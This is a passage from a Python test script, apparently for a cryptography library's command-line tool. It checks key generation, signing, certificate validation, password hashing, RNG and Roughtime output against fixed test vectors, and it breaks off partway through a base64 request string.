expected = "$argon2id$v=19$m=8,t=1,p=1$2A+I9q2+ZayxDDYC5n2YWw$/Lhx+Jbtlpw+Kxpskfv7+AKhBL/5ebalTJkVC1O5+1E"
test_cli("gen_argon2", ['--mem=8', password], expected)
test_cli("gen_argon2", ['--mem=8', '--t=1', password], expected)
test_cli("gen_argon2", ['--mem=8', '--t=1', '--p=1', password], expected)
test_cli("check_argon2", [password, expected], "Password is valid")
test_cli("check_argon2", ["guessing", expected], "Password is NOT valid")
def cli_gen_dl_group_tests(_tmp_dir):
pem = """-----BEGIN X9.42 DH PARAMETERS-----
MIIBJAKBgwTw7LQiLkXJsrgMVQxTPlWaQlYz/raZ+5RtIZe4YluQgRQGPFADLZ/t
TOYzuIzZJFOcdKtEtrVkxZRGSkjZwKFKLUD6fzSjoC2M2EHktK/y5HsvxBxL4tKr
q1ffbyPQi+iBLYTZAXygvxj2vWyrvA+/w4nbt1fStCHTDhWjLWqFpV9nAoGDAKzA
HUu/IRl7OiUtW/dz36gzEJnaYtz4ZtJl0FG8RJiOe02lD8myqW2sVzYqMvKD0LGx
x9fdSKC1G+aZ/NWtqrQjb66Daf7b0ddDx+bfWTWJ2dOtZd8IL2rmQQJm+JogDi9i
huVYFicDNQGzi+nEKAzrZ1L/VxtiSiw/qw0IyOuVtz8CFjgPiPatvmWssQw2AuZ9
mFvAZ/8wal0=
-----END X9.42 DH PARAMETERS-----"""
test_cli("gen_dl_group", "--pbits=1043", pem)
dsa_grp = """-----BEGIN X9.42 DH PARAMETERS-----
MIIBHgKBgQCyP1vosC/axliM2hmJ9EOSdd1zBkuzMP25CYD8PFkRVrPLr1ClSUtn
eXTIsHToJ7d7sRwtidQGW9BrvUEyiAWE06W/wnLPxB3/g2/l/P2EhbNmNHAO7rV7
ZVz/uKR4Xcvzxg9uk5MpT1VsxA8H6VEwzefNF1Rya92rqGgBTNT3/wKBgC7HLL8A
Gu3tqJxTk1iNgojjOiSreLn6ihA8R8kQnRXDTNtDKz996KHGInfMBurUI1zPM3xq
bHc0CvU1Nf87enhPIretzJcFgiCWrNFUIC25zPEjp0s3/ERHT4Bi1TABZ3j6YUEQ
fnnj+9XriKKHf2WtX0T4FXorvnKq30m934rzAhUAvwhWDK3yZEmphc7dwl4/J3Zp
+MU=
-----END X9.42 DH PARAMETERS-----"""
test_cli("gen_dl_group", ["--type=dsa", "--pbits=1024"], dsa_grp)
def cli_key_tests(tmp_dir):
pem = """-----BEGIN PRIVATE KEY-----
MIGEAgEAMBAGByqGSM49AgEGBSuBBAAKBG0wawIBAQQg2A+I9q2+ZayxDDYC5n2Y
W8Bn/zBm4D3mwS5qMwADRDehRANCAATwnDFqsjXL9SD/Rr1Vy4pb79PswXdQNZBN
mlLtJ5JvZ0/p6zP3x+Y9yPIrAR8L/acG5ItSrAKXzzuqQQZMv4aN
-----END PRIVATE KEY-----"""
priv_key = os.path.join(tmp_dir, 'priv.pem')
pub_key = os.path.join(tmp_dir, 'pub.pem')
pub_der_key = os.path.join(tmp_dir, 'pub.der')
enc_pem = os.path.join(tmp_dir, 'priv_enc.pem')
enc_der = os.path.join(tmp_dir, 'priv_enc.der')
ca_cert = os.path.join(tmp_dir, 'ca.crt')
crt_req = os.path.join(tmp_dir, 'crt.req')
user_cert = os.path.join(tmp_dir, 'user.crt')
test_cli("keygen", ["--algo=ECDSA", "--params=secp256k1"], pem)
test_cli("keygen", ["--algo=ECDSA", "--params=secp256r1", "--output=" + priv_key], "")
test_cli("pkcs8", "--pub-out --output=%s %s" % (pub_key, priv_key), "")
test_cli("pkcs8", "--pub-out --der-out --output=%s %s" % (pub_der_key, priv_key), "")
test_cli("pkcs8", "--pass-out=foof --der-out --output=%s %s" % (enc_der, priv_key), "")
test_cli("pkcs8", "--pass-out=foof --output=%s %s" % (enc_pem, priv_key), "")
dec_pem = test_cli("pkcs8", ["--pass-in=foof", enc_pem], None)
dec_der = test_cli("pkcs8", ["--pass-in=foof", enc_der], None)
if dec_pem != dec_der:
logging.error("Problem decrypting PKCS8 key")
test_cli("fingerprint", ['--no-fsname', pub_key],
"83:FC:67:87:30:C7:0C:9C:54:9A:E7:A1:FA:25:83:4C:77:A4:43:16:33:6D:47:3C:CE:4B:91:62:30:97:62:D4")
test_cli("fingerprint", ['--no-fsname', pub_der_key],
"83:FC:67:87:30:C7:0C:9C:54:9A:E7:A1:FA:25:83:4C:77:A4:43:16:33:6D:47:3C:CE:4B:91:62:30:97:62:D4")
test_cli("fingerprint", ['--no-fsname', pub_key, pub_der_key],
"83:FC:67:87:30:C7:0C:9C:54:9A:E7:A1:FA:25:83:4C:77:A4:43:16:33:6D:47:3C:CE:4B:91:62:30:97:62:D4\n"
"83:FC:67:87:30:C7:0C:9C:54:9A:E7:A1:FA:25:83:4C:77:A4:43:16:33:6D:47:3C:CE:4B:91:62:30:97:62:D4")
test_cli("fingerprint", [pub_der_key],
pub_der_key +
": 83:FC:67:87:30:C7:0C:9C:54:9A:E7:A1:FA:25:83:4C:77:A4:43:16:33:6D:47:3C:CE:4B:91:62:30:97:62:D4")
test_cli("fingerprint", ['-'],
"83:FC:67:87:30:C7:0C:9C:54:9A:E7:A1:FA:25:83:4C:77:A4:43:16:33:6D:47:3C:CE:4B:91:62:30:97:62:D4",
open(pub_key, 'rb').read().decode())
valid_sig = "nI4mI1ec14Y7nYUWs2edysAVvkob0TWpmGh5rrYWDA+/W9Fj0ZM21qJw8qa3/avAOIVBO6hoMEVmfJYXlS+ReA=="
test_cli("sign", "--provider=base %s %s" % (priv_key, pub_key), valid_sig)
test_cli("verify", [pub_key, pub_key, '-'],
"Signature is valid", valid_sig)
test_cli("verify", [pub_key, pub_key, '-'],
"Signature is invalid",
valid_sig.replace("G", "H"))
test_cli("gen_self_signed",
[priv_key, "CA", "--ca", "--country=VT",
"--dns=ca.example", "--hash=SHA-384", "--output="+ca_cert],
"")
test_cli("cert_verify", ca_cert, "Certificate did not validate - Cannot establish trust")
cert_info = test_cli("cert_info", ['--fingerprint', ca_cert], None)
if cert_info.find('Subject: CN="CA",C="VT"') < 0:
logging.error('Unexpected output for cert_info command %s', cert_info)
if cert_info.find('Subject keyid: 69DD911C9EEE3400C67CBC3F3056CBE711BD56AF9495013F') < 0:
logging.error('Unexpected output for cert_info command %s', cert_info)
test_cli("gen_pkcs10", "%s User --output=%s" % (priv_key, crt_req))
test_cli("sign_cert", "%s %s %s --output=%s" % (ca_cert, priv_key, crt_req, user_cert))
test_cli("cert_verify", [user_cert, ca_cert],
"Certificate passes validation checks")
test_cli("cert_verify", user_cert,
"Certificate did not validate - Certificate issuer not found")
def cli_xmss_sign_tests(tmp_dir):
priv_key = os.path.join(tmp_dir, 'priv.pem')
pub_key = os.path.join(tmp_dir, 'pub.pem')
pub_key2 = os.path.join(tmp_dir, 'pub2.pem')
msg = os.path.join(tmp_dir, 'input')
sig1 = os.path.join(tmp_dir, 'sig1')
sig2 = os.path.join(tmp_dir, 'sig2')
test_cli("rng", ['--output=%s' % (msg)], "")
test_cli("hash", ["--no-fsname", msg], "E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855")
test_cli("keygen", ["--algo=XMSS", "--output=%s" % (priv_key)], "")
test_cli("hash", ["--no-fsname", priv_key], "5B38F737BA41BE7F40433DB30EAEF7C41ABB0F7D9E7A09DEB5FDCE7B6811693F")
test_cli("pkcs8", "--pub-out --output=%s %s" % (pub_key, priv_key), "")
test_cli("fingerprint", ['--no-fsname', pub_key],
"B0:F4:98:6E:D8:4E:05:63:A1:D8:4B:37:61:5A:A0:41:78:7E:DE:0E:72:46:E0:A8:D6:CF:09:54:08:DA:A4:22")
# verify the key is updated after each signature:
test_cli("sign", [priv_key, msg, "--output=%s" % (sig1)], "")
test_cli("verify", [pub_key, msg, sig1], "Signature is valid")
test_cli("hash", ["--no-fsname", sig1], "04AF45451C7A9AF2D828E1AD6EC262E012436F4087C5DA6F32C689D781E597D0")
test_cli("hash", ["--no-fsname", priv_key], "67929FAEC636E43DE828C1CD7E2D11CE7C3388CE90DD0A0F687C6627FFA850CD")
test_cli("sign", [priv_key, msg, "--output=%s" % (sig2)], "")
test_cli("verify", [pub_key, msg, sig2], "Signature is valid")
test_cli("hash", ["--no-fsname", sig2], "0785A6AD54CC7D01F2BE2BC6463A3EAA1159792E52210ED754992C5068E8F24F")
test_cli("hash", ["--no-fsname", priv_key], "1940945D68B1CF54D79E05DD7913A4D0B4959183F1E12B81A4E43EF4E63FBD20")
# private key updates, public key is unchanged:
test_cli("pkcs8", "--pub-out --output=%s %s" % (pub_key2, priv_key), "")
test_cli("fingerprint", ['--no-fsname', pub_key2],
"B0:F4:98:6E:D8:4E:05:63:A1:D8:4B:37:61:5A:A0:41:78:7E:DE:0E:72:46:E0:A8:D6:CF:09:54:08:DA:A4:22")
def cli_pbkdf_tune_tests(_tmp_dir):
if not check_for_command("pbkdf_tune"):
return
expected = re.compile(r'For (default|[1-9][0-9]*) ms selected Scrypt\([0-9]+,[0-9]+,[0-9]+\) using [0-9]+ MiB')
output = test_cli("pbkdf_tune", ["--check", "1", "10", "50", "default"], None).split('\n')
for line in output:
if expected.match(line) is None:
logging.error("Unexpected line '%s'" % (line))
expected_pbkdf2 = re.compile(r'For (default|[1-9][0-9]*) ms selected PBKDF2\(HMAC\(SHA-256\),[0-9]+\)')
output = test_cli("pbkdf_tune", ["--algo=PBKDF2(SHA-256)", "--check", "1", "10", "50", "default"], None).split('\n')
for line in output:
if expected_pbkdf2.match(line) is None:
logging.error("Unexpected line '%s'" % (line))
expected_argon2 = re.compile(r'For (default|[1-9][0-9]*) ms selected Argon2id\([0-9]+,[0-9]+,[0-9]+\)')
output = test_cli("pbkdf_tune", ["--algo=Argon2id", "--check", "1", "10", "50", "default"], None).split('\n')
for line in output:
if expected_argon2.match(line) is None:
logging.error("Unexpected line '%s'" % (line))
def cli_psk_db_tests(tmp_dir):
if not check_for_command("psk_get"):
return
psk_db = os.path.join(tmp_dir, 'psk.db')
db_key1 = "909"*32
db_key2 = "451"*32
test_cli("psk_set", [psk_db, db_key1, "name", "F00FEE"], "")
test_cli("psk_set", [psk_db, db_key2, "name", "C00FEE11"], "")
test_cli("psk_set", [psk_db, db_key1, "name2", "50051029"], "")
test_cli("psk_get", [psk_db, db_key1, "name"], "F00FEE")
test_cli("psk_get", [psk_db, db_key2, "name"], "C00FEE11")
test_cli("psk_list", [psk_db, db_key1], "name\nname2")
test_cli("psk_list", [psk_db, db_key2], "name")
def cli_compress_tests(tmp_dir):
if not check_for_command("compress"):
return
input_file = os.path.join(tmp_dir, 'input.txt')
output_file = os.path.join(tmp_dir, 'input.txt.gz')
with open(input_file, 'w') as f:
f.write("hi there")
f.close()
test_cli("compress", input_file)
if not os.access(output_file, os.R_OK):
logging.error("Compression did not created expected output file")
is_py3 = sys.version_info[0] == 3
output_hdr = open(output_file, 'rb').read(2)
if is_py3:
if output_hdr[0] != 0x1F or output_hdr[1] != 0x8B:
logging.error("Did not see expected gzip header")
else:
if ord(output_hdr[0]) != 0x1F or ord(output_hdr[1]) != 0x8B:
logging.error("Did not see expected gzip header")
os.unlink(input_file)
test_cli("decompress", output_file)
if not os.access(input_file, os.R_OK):
logging.error("Decompression did not created expected output file")
recovered = open(input_file).read()
if recovered != "hi there":
logging.error("Decompression did not recover original input")
def cli_rng_tests(_tmp_dir):
test_cli("rng", "10", "D80F88F6ADBE65ACB10C")
test_cli("rng", "16", "D80F88F6ADBE65ACB10C3602E67D985B")
test_cli("rng", "10 6", "D80F88F6ADBE65ACB10C\n1B119CC068AF")
test_cli("rng", ['--format=base64', '10'], "2A+I9q2+ZayxDA==")
test_cli("rng", ['--format=base58', '10'], "D93XRyVfxqs7oR")
test_cli("rng", ['--format=base58check', '10'], "2NS1jYUq92TyGFVnhVLa")
hex_10 = re.compile('[A-F0-9]{20}')
for rng in ['system', 'auto', 'entropy']:
output = test_cli("rng", ["10", '--%s' % (rng)], use_drbg=False)
if output == "D80F88F6ADBE65ACB10C":
logging.error('RNG produced DRBG output')
if hex_10.match(output) is None:
logging.error('Unexpected RNG output %s' % (output))
has_rdrand = test_cli("cpuid", []).find(' rdrand ') > 0
if has_rdrand:
output = test_cli("rng", ["10", '--rdrand'], use_drbg=False)
if output == "D80F88F6ADBE65ACB10C":
logging.error('RDRAND produced DRBG output')
if hex_10.match(output) is None:
logging.error('Unexpected RNG output %s' % (output))
def cli_roughtime_check_tests(tmp_dir):
# pylint: disable=line-too-long
if not check_for_command("roughtime_check"):
return
chain = os.path.join(tmp_dir, 'roughtime-chain')
with open(chain, 'w') as f:
f.write("""\
ed25519 bbT+RPS7zKX6w71ssPibzmwWqU9ffRV5oj2OresSmhE= eu9yhsJfVfguVSqGZdE8WKIxaBBM0ZG3Vmuc+IyZmG2YVmrIktUByDdwIFw6F4rZqmSFsBO85ljoVPz5bVPCOw== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWBnGOEajOwPA6G7oL47seBP4C7eEpr57H43C2/fK/kMA0UGZVUdf4KNX8oxOK6JIcsbVk8qhghTwA70qtwpYmQkDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AJrA8tEqPBQAqisiuAxgy2Pj7UJAiWbCdzGz1xcCnja3T+AqhC8fwpeIwW4GPy/vEb/awXW2DgSLKJfzWIAz+2lsR7t4UjNPvAgAAAEAAAABTSUcAREVMRes9Ch4X0HIw5KdOTB8xK4VDFSJBD/G9t7Et/CU7UW61OiTBXYYQTG2JekWZmGa0OHX1JPGG+APkpbsNw0BKUgYDAAAAIAAAACgAAABQVUJLTUlOVE1BWFR/9BWjpsWTQ1f6iUJea3EfZ1MkX3ftJiV3ABqNLpncFwAAAAAAAAAA//////////8AAAAA
ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= uLeTON9D+2HqJMzK6sYWLNDEdtBl9t/9yw1cVAOm0/sONH5Oqdq9dVPkC9syjuWbglCiCPVF+FbOtcxCkrgMmA== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWOw1jl0uSiBEH9HE8/6r7zxoSc01f48vw+UzH8+VJoPelnvVJBj4lnH8uRLh5Aw0i4Du7XM1dp2u0r/I5PzhMQoDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AUBo+tEqPBQC47l77to7ESFTVhlw1SC74P5ssx6gpuJ6eP+1916GuUiySGE/x3Fp0c3otUGAdsRQou5p9PDTeane/YEeVq4/8AgAAAEAAAABTSUcAREVMRe5T1ml8wHyWAcEtHP/U5Rg/jFXTEXOSglngSa4aI/CECVdy4ZNWeP6vv+2//ZW7lQsrWo7ZkXpvm9BdBONRSQIDAAAAIAAAACgAAABQVUJLTUlOVE1BWFQpXlenV0OfVisvp9jDHXLw8vymZVK9Pgw9k6Edf8ZEhUgSGEc5jwUASHLvZE2PBQAAAAAA
ed25519 etPaaIxcBMY1oUeGpwvPMCJMwlRVNxv51KK/tktoJTQ= U53wX99JzZwy4BXa9C6R04bPu4yqFB5w5/wTgG8Mw5wm+VLrY70ECxJ9ZHnpdHVHaLEU3aeLnQFZyZPRAEOCyw== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWMh3mPWCCbOlX8xDWbU9qdfKoReJX/XLsivom8bJJYmcC7T03tyXrtWUheEJweHtg4qMgSyifQS1MjHJSy1jPAsDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8Akxw/tEqPBQBfOsOuciR7jiAW5itQ39y8yVr/ZJmgMwvTjqaU4/wA05ZqG4RqoLdvDXh5bCNySL6LrrnBNSAHwn5COt0CItNuAgAAAEAAAABTSUcAREVMRVP3BIOzsZmuxqMi+ScIBPyKtzFfK7ZlPFNP0JrNwln2QYtAcQFIKywDdNAAL+n8i3dz1p99K50FJjCkCl2J6AMDAAAAIAAAACgAAABQVUJLTUlOVE1BWFQKC/kZVdjiNT2NCSGfnpot4eqipyMFsyMjiIQmqqqXqQCAa245jwUAAGCgA56PBQAAAAAA
ed25519 AW5uAoTSTDfG5NfY1bTh08GUnOqlRb+HVhbJ3ODJvsE= IcZcXFuaLKYYhWcK3sT/6PrVeXMmabCRbf9hvVfkMkqEW1PFL++ZnHJ1/m+G8azITxvktwsfP1YAOOxWdbf9XQ== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWL5DAl8GPNUQ/mSXl0tI4N9yZAO+PiXTodJOTDL+WU/x26iqgyyQRikSSocRMzAEVLDGasdyW19mVC6H/6vfXggDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8Av/JAtEqPBQBIP346SHhCdDfughzeH+uYSbxngDYxqHzBDtZt0obUKrzxfRWzD1oR61B1reLvoPVCKSfzEngi/g1NSQjTrzNMAgAAAEAAAABTSUcAREVMRTQLLplQv0rN4p77Bo59qT8bbquV6MKSwILI/Tw2LLGo9noaZegUFmM+rNu1d1AVOEVQ01j6/2xDmBvp0d6MZgEDAAAAIAAAACgAAABQVUJLTUlOVE1BWFS4a1dYoIB5u/zkbR3sIteuhVrQkszzj+Gng9ywo6O9VgAAAAAAAAAA//////////8AAAAA
ed25519 cj8GsiNlRkqiDElAeNMSBBMwrAl15hYPgX50+GWX/lA= Tsy82BBU2xxVqNe1ip11OyEGoKWhKoSggWjBmDTSBmKbTs7bPPCEidYc5TQ23sQUWe62G35fQOVU28q+Eq5uhQ== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWDAmi7zgXAqLgQXVfbjeqnUZRiXCZI64QIoAKFL83CQHbyXgB4cNwHfQ9mSg0hYxTp1M8QxOuzusnUpk05DIRwwDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AcOBCtEqPBQBhsr1mKOxxCf4VDFzAtYB4Nhs332AN1LrJU/8+VqktzfPd2R7awJHEVEWugvSvOrr+9d332mQObAkYfKfDtbSFAgAAAEAAAABTSUcAREVMRUjnhDvkIjFzTEYtgHOfMpRHtnNZj4P31RFtapkwzGjOtc93pYDd7zqQCw2AVcfbSnPqa8k26z96Q9fVRzq0pw8DAAAAIAAAACgAAABQVUJLTUlOVE1BWFR7qp2oerjpbN8Y23nUGARIlsgkodW4owH29ZKhxDMn8AAAAAAAAAAA//////////8AAAAA
""")
test_cli("roughtime_check", chain, """\
1: UTC 2019-08-04T13:38:17 (+-1000000us)
2: UTC 2019-08-04T13:38:17 (+-1000000us)
3: UTC 2019-08-04T13:38:17 (+-1000000us)
4: UTC 2019-08-04T13:38:18 (+-1000000us)
5: UTC 2019-08-04T13:38:18 (+-1000000us)""")
with open(chain, 'w') as f:
f.write("ed25519 bbT+RPS7zKX6w71ssPibzmwWqU9ffRV5oj2OresSmhE= eu9yhsJfVfguVSqGZdE8WKIxaBBM0ZG3Vmuc+IyZmG2YVmrIktUByDdwIFw6F4rZqmSFsBO85ljoVPz5bVPCOw== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWBnGOEajOwPA6G7oL47seBP4C7eEpr57H43C2/fK/kMA0UGZVUdf4KNX8oxOK6JIcsbVk8qhghTwA70qtwpYmQkDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AJrA8tEqPBQAqisiuAxgy2Pj7UJAiWbCdzGz1xcCnja3T+AqhC8fwpeIwW4GPy/vEb/awXW2DgSLKJfzWIAz+2lsR7t4UjNPvAgAAAEAAAABTSUcAREVMRes9Ch4X0HIw5KdOTB8xK4VDFSJBD/G9t7Et/CU7UW61OiTBXYYQTG2JekWZmGa0OHX1JPGG+APkpbsNw0BKUgYDAAAAIAAAACgAAABQVUJLTUlOVE1BWFR/9BWjpsWTQ1f6iUJea3EfZ1MkX3ftJiV3ABqNLpncFwAAAAAAAAAA//////////8AAAAA")
test_cli("roughtime_check", [chain, "--raw-time"], "1: UTC 1564925897781286 (+-1000000us)")
with open(chain, 'w') as f:
f.write("ed25519 cbT+RPS7zKX6w71ssPibzmwWqU9ffRV5oj2OresSmhE= eu9yhsJfVfguVSqGZdE8WKIxaBBM0ZG3Vmuc+IyZmG2YVmrIktUByDdwIFw6F4rZqmSFsBO85ljoVPz5bVPCOw== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWBnGOEajOwPA6G7oL47seBP4C7eEpr57H43C2/fK/kMA0UGZVUdf4KNX8oxOK6JIcsbVk8qhghTwA70qtwpYmQkDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AJrA8tEqPBQAqisiuAxgy2Pj7UJAiWbCdzGz1xcCnja3T+AqhC8fwpeIwW4GPy/vEb/awXW2DgSLKJfzWIAz+2lsR7t4UjNPvAgAAAEAAAABTSUcAREVMRes9Ch4X0HIw5KdOTB8xK4VDFSJBD/G9t7Et/CU7UW61OiTBXYYQTG2JekWZmGa0OHX1JPGG+APkpbsNw0BKUgYDAAAAIAAAACgAAABQVUJLTUlOVE1BWFR/9BWjpsWTQ1f6iUJea3EfZ1MkX3ftJiV3ABqNLpncFwAAAAAAAAAA//////////8AAAAA")
test_cli("roughtime_check", chain, expected_stderr=b'Error: Roughtime Invalid signature or public key\n')
def cli_roughtime_tests(tmp_dir):
# pylint: disable=line-too-long
# pylint: disable=too-many-locals
import socket
import base64
import threading
if not check_for_command("roughtime"):
return
server_port = random_port_number()
chain_file = os.path.join(tmp_dir, 'roughtime-chain')
ecosystem = os.path.join(tmp_dir, 'ecosystem')
def run_udp_server():
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('127.0.0.1', server_port)
sock.bind(server_address)
while True:
data, address = sock.recvfrom(4096)
if data:
if data != base64.b64decode(server_request):
logging.error("unexpected request")
sock.sendto(base64.b64decode(server_response), address)
udp_thread = threading.Thread(target=run_udp_server)
udp_thread.daemon = True
udp_thread.start()
chain = [
"""\
ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= 2A+I9q2+ZayxDDYC5n2YW8Bn/zBm4D3mwS5qMwADRDcbFpBcf3yPOyeZiqpLBTkxo8GT8zMQFeApv4ScffjC8A== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWDwlo/AkUnTrecAW4Ci5Tkh3KOqs6R7KLTsFtq16RXN5F7G5ckGv11UtzHoZTbKbEk03a6ogAOK54Q2CI/7XGA8DAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AWDLihlaSBQAoq/5gEjRCrhfH16X2GYjQJSG/CgSuGhYeCsrw7XkphLI3cxw2unJRDW8DAJrYqEGaW0NPKZk7bbpPjU/Q6Es1AgAAAEAAAABTSUcAREVMRUJbs67Sb5Wx/jzWyT1PhWR0c4kg59tjSGofo8R3eHzcA9CGwavuRdxOArhVWWODG99gYgfmjcRLgt9/jH+99w4DAAAAIAAAACgAAABQVUJLTUlOVE1BWFRXRfQ1RHLWGOgqABUTYfVBDZrv3OL2nPLYve9ldfNVLOjdPVFFkgUA6D0Vb1mSBQAAAAAA
""",
"""\
ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= 2A+I9q2+ZayxDDYC5n2YW8Bn/zBm4D3mwS5qMwADRDcbFpBcf3yPOyeZiqpLBTkxo8GT8zMQFeApv4ScffjC8A== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWDwlo/AkUnTrecAW4Ci5Tkh3KOqs6R7KLTsFtq16RXN5F7G5ckGv11UtzHoZTbKbEk03a6ogAOK54Q2CI/7XGA8DAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AWDLihlaSBQAoq/5gEjRCrhfH16X2GYjQJSG/CgSuGhYeCsrw7XkphLI3cxw2unJRDW8DAJrYqEGaW0NPKZk7bbpPjU/Q6Es1AgAAAEAAAABTSUcAREVMRUJbs67Sb5Wx/jzWyT1PhWR0c4kg59tjSGofo8R3eHzcA9CGwavuRdxOArhVWWODG99gYgfmjcRLgt9/jH+99w4DAAAAIAAAACgAAABQVUJLTUlOVE1BWFRXRfQ1RHLWGOgqABUTYfVBDZrv3OL2nPLYve9ldfNVLOjdPVFFkgUA6D0Vb1mSBQAAAAAA
ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= 2A+I9q2+ZayxDDYC5n2YW8Bn/zBm4D3mwS5qMwADRDcbFpBcf3yPOyeZiqpLBTkxo8GT8zMQFeApv4ScffjC8A== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWHH5Ofs4HciIFXjE9egjDbistJptoMXIC7ugCgHhI4NPJqfYY256NpULXKc9c30ul7oHXQyKLfGd84mIAxC3UwQDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AuOoUh1aSBQANeC4gGGG3a23PpmF+y6CrUS9VWjyj0Ydpl2tMVDLaK2vd5QtYKKJ3UOyprGKk0D/aPn4E3Bk2rE3BKBZRXM1AAgAAAEAAAABTSUcAREVMRci9uvioJssgd8txxFlqz9RqPx+YLVMkHmm24fMUtYGWF/nhkoEYVGT7O+tXSfHHY/KHcUZjVaZpEt/tmXlXBAUDAAAAIAAAACgAAABQVUJLTUlOVE1BWFSxhKhavdriTvCAtNVcK5yr0cAbsWp2MsrwUV5YTc+7V0CsaLZSkgUAQAxA1GaSBQAAAAAA
""",
"""\
ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= SbWKPilWYrt+1vgFU3jlxGNOH6I/1npX8wl+KoraN3S6VDsyM6EfCV+JPEK8BsNoM2VIpMcSdjcVna/GwXwZkg== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWHH5Ofs4HciIFXjE9egjDbistJptoMXIC7ugCgHhI4NPJqfYY256NpULXKc9c30ul7oHXQyKLfGd84mIAxC3UwQDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AuOoUh1aSBQANeC4gGGG3a23PpmF+y6CrUS9VWjyj0Ydpl2tMVDLaK2vd5QtYKKJ3UOyprGKk0D/aPn4E3Bk2rE3BKBZRXM1AAgAAAEAAAABTSUcAREVMRci9uvioJssgd8txxFlqz9RqPx+YLVMkHmm24fMUtYGWF/nhkoEYVGT7O+tXSfHHY/KHcUZjVaZpEt/tmXlXBAUDAAAAIAAAACgAAABQVUJLTUlOVE1BWFSxhKhavdriTvCAtNVcK5yr0cAbsWp2MsrwUV5YTc+7V0CsaLZSkgUAQAxA1GaSBQAAAAAA
ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= 2A+I9q2+ZayxDDYC5n2YW8Bn/zBm4D3mwS5qMwADRDcbFpBcf3yPOyeZiqpLBTkxo8GT8zMQFeApv4ScffjC8A== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWN5Y0b2irPS1JgqJFQMciPg4aWd9qj1ZqcJc5bGXe1m4ZdAXa5OIhXa0+680MgpyhEHhqYJDIwH1XRa1OZx5YAUDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AgBW3iFaSBQD9WI+Qr6NOZsDmP0PsnCo66mstM3ac5ZON+I+ZeEK8lZWBASvsD2JIfq3v4d1QH5g4STs3wOazQPc25Puy659ZAgAAAEAAAABTSUcAREVMRUJbs67Sb5Wx/jzWyT1PhWR0c4kg59tjSGofo8R3eHzcA9CGwavuRdxOArhVWWODG99gYgfmjcRLgt9/jH+99w4DAAAAIAAAACgAAABQVUJLTUlOVE1BWFRXRfQ1RHLWGOgqABUTYfVBDZrv3OL2nPLYve9ldfNVLOjdPVFFkgUA6D0Vb1mSBQAAAAAA
""",
]
request = [
"AgAAAEAAAABOT05DUEFE/9gPiPatvmWssQw2AuZ9mFvAZ/8wZuA95sEuajMAA0Q3GxaQXH98jzsnmYqqSwU5MaPBk/MzEBXgKb+EnH34wvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA